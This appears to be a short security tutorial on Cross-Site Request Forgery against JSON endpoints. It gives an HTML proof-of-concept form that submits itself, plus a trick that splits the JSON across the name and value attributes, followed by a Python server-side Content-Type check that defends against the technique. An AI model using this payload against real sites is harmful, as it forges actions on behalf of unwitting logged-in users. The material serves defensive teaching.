Sometimes you see a possible Cross-Site Request Forgery (CSRF) attack against JSON endpoints, where the request body is a JSON blob instead of x-www-form-urlencoded data.
Here is a PoC that will send a JSON CSRF.
<html>
<form action="http://127.0.0.1/json" method="post" enctype="text/plain" name="jsoncsrf">
<input name='{"json":{"nested":"obj"},"list":["0","1"]}' type='hidden'>
</form>
<script>
document.jsoncsrf.submit()
</script>
</html>
You can use any JSON including nested objects, lists, etc.
Because a text/plain form encodes each field as name=value, the previous example sends the JSON followed by a trailing equals sign =, which will break some parsers. You can get around it by splitting the JSON across the name and value attributes:
<input name='{"json":"data","extra' value='":"stuff"}' type='hidden'>
Which will give the following JSON:
{"json":"data","extra=":"stuff"}
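The two form bodies above, reproduced as a browser would encode them, next to the server-side check that stops this class of request regardless of how the body is shaped: a form can only ever send text/plain, multipart/form-data or x-www-form-urlencoded, so an endpoint that requires a Content-Type of application/json never sees a forged body. This is an added example, not code from the original post; the function names are my own, and the hidden inputs are assumed to have an empty value where no value attribute is given.

```python
import json


def text_plain_form_body(fields):
    """Encode (name, value) pairs the way a browser does for enctype="text/plain"."""
    # Each field becomes "name=value" followed by CRLF; an <input> with no value
    # attribute contributes an empty value, which is where the trailing "=" comes from.
    return "".join(f"{name}={value}\r\n" for name, value in fields)


def parses_as_json(body):
    """True if a strict JSON parser accepts the body (trailing whitespace is fine)."""
    try:
        json.loads(body)
        return True
    except json.JSONDecodeError:
        return False


def media_type(content_type):
    """Normalise 'Application/JSON; charset=utf-8' to 'application/json'."""
    return content_type.split(";", 1)[0].strip().lower()


def accept_json_request(headers, body):
    """Return (parsed_json, 'ok') for an acceptable request, else (None, reason).

    The Content-Type check is the CSRF defence: HTML forms cannot set
    application/json, and a cross-origin script needs CORS permission to do so.
    """
    ct = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    if media_type(ct) != "application/json":
        return None, f"rejected: Content-Type {ct!r} is not application/json"
    try:
        return json.loads(body), "ok"
    except json.JSONDecodeError as exc:
        return None, f"rejected: invalid JSON ({exc.msg})"


if __name__ == "__main__":
    # Constructed inputs matching the two forms in the post.
    plain = text_plain_form_body([('{"json":{"nested":"obj"},"list":["0","1"]}', "")])
    split = text_plain_form_body([('{"json":"data","extra', '":"stuff"}')])
    print(repr(plain), parses_as_json(plain))   # trailing "=" breaks strict parsing
    print(repr(split), parses_as_json(split))   # the split trick yields valid JSON
    print(accept_json_request({"Content-Type": "text/plain"}, split))
    print(accept_json_request({"Content-Type": "application/json"}, '{"json":"data"}'))
```

Rejecting on Content-Type alone is enough against this form-based vector, but it does not replace a per-session CSRF token or an Origin header check on endpoints that also accept form encodings.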